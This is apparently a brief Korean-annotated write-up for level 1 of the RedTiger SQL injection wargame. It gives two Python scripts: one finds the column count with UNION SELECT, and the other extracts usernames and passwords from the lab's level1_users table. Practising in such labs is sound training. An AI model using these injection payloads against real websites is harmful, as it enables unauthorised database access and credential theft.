[redtiger] level1¶
union select¶
- 컬럼 개수 확인
import requests
requests.packages.urllib3.disable_warnings()
url = "https://redtiger.labs.overthewire.org/level1.php"
n = 0
ret = ''
for l in range(20):
params = {
"cat": "1 union select %s from level1_users" % str(n)
}
print params.values()[0]
n = str(n) + "," + str(l+1)
r = requests.get(url, params=params, verify=False)
print r.content
union select¶
- 데이터 추출
import requests
requests.packages.urllib3.disable_warnings()
url = "https://redtiger.labs.overthewire.org/level1.php"
params = {
"cat": "1 union select 1,2,username,password from level1_users"
}
r = requests.get(url, params=params, verify=False)
print r.content